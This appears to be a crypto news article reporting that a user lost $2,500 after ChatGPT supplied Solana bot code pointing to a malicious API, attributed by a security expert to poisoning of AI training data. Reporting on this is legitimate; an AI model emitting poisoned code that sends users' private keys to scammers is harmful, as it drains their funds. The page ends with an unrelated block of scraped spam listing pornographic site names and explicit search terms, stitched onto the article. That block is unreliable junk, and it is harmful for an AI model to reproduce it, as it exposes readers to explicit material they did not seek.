Home Altcoins Solana Exploit Reveals Risks of AI-Generated Code

Solana Exploit Reveals Risks of AI-Generated Code

by


  • A user lost $2,500 after using AI to code on Solana. 
  • ChatGPT provided a malicious API link.
  • The incident shows the risks of AI-generated code. 

Artificial intelligence (AI) is rapidly changing how people perform work, including programming. The AI’s ability to generate code is seen as a way to streamline work for developers, and even enable non-developers to create applications. However, AI also comes with risks, including in programming.

A recent incident revealed the risks of using AI-generated code in crypto. In the first-ever incident of its type in crypto, one user reported losing $2,500 after ChatGPT served malicious code for his Solana application. 

AI-Generated Code Leads to Solana Wallet Exploit

The first incident of its type revealed the dangers of AI-generated coding in crypto. On November 21, a user reported losing $2,500 after working on a bot for Solana’s Pump.fun platform. The issue arose when ChatGPT gave the user malicious code. 

The user asked ChatGPT for help with the code. However, the AI model provided a malicious API link, which redirected the user to a scam website. After the user inputted his private key to the API, the attackers quickly drained the wallet of its assets, including SOL and USDC.

Following the incident, the user reported the malicious repository and highlighted the attacker’s wallet. The user also reported the malicious code repository, expressing hope that it would be removed soon. 

AI Poisoning Likely Cultpit

Following the incident, security experts analyzed what happened. Yu Xian, the founder of the security firm Slowmist suggested that the likely explanation was the user playing around with AI-generated code without verifying it. 

He suggested that the likely explanation for the incident was AI poisoning. This happens when AI’s training data contains code from compromised or malicious repositories. The practice of deliberately trying to insert malicious code into AI training data is known as AI poisoning, a growing risk for AI users. 

The incident reveals the dangers of trusting AI-generated code without independently verifying it. Despite AI’s potential to make coding more accessible, developers should make sure that they stay safe when using it. 

On the Flipside

  • AI poisoning could undermine the trust in using programs like ChatGPT, especially for coding. 
  • LLMs can provide inaccurate information even in tasks other than coding, which introduces risks for users. 

Why This Matters

The exploit reveals the risks of using AI-generated code in crypto, especially for inexperienced users. Users should verify the critical parts of the generated code before interacting with it. 

Read more about crypto hacks: 
12 Biggest Hacks in Crypto Exchange History

Read more about Solana’s latest performance: 
Solana’s All-Time High Gives Whales Millions in Profits





Source link

Related Articles

xxxanti beeztube.mobi hot sexy mp4 menyoujan hentaitgp.net jason voorhees hentai indian soft core chupatube.net youjzz ez2 may 8 2023 pinoycinema.org ahensya ng pamahalaan pakistani chut ki chudai pimpmovs.com www xvedio dost ke papa zztube.mobi 300mbfilms.in صور مص الزب arabporna.net نهر العطش لمن تشعر بالحرمان movierulz plz.in bustyporntube.info how to make rangoli video 穂高ゆうき simozo.net 四十路五十路 ロシアav javvideos.net 君島みお 無修正 افلام سكس في المطبخ annarivas.net فيلم سكس قديم rashmi hot videos porncorn.info audiosexstories b grade latest nesaporn.pro high school girls sex videos real life cam eroebony.info painfull porn exbii adult pics teacherporntrends.com nepali school sex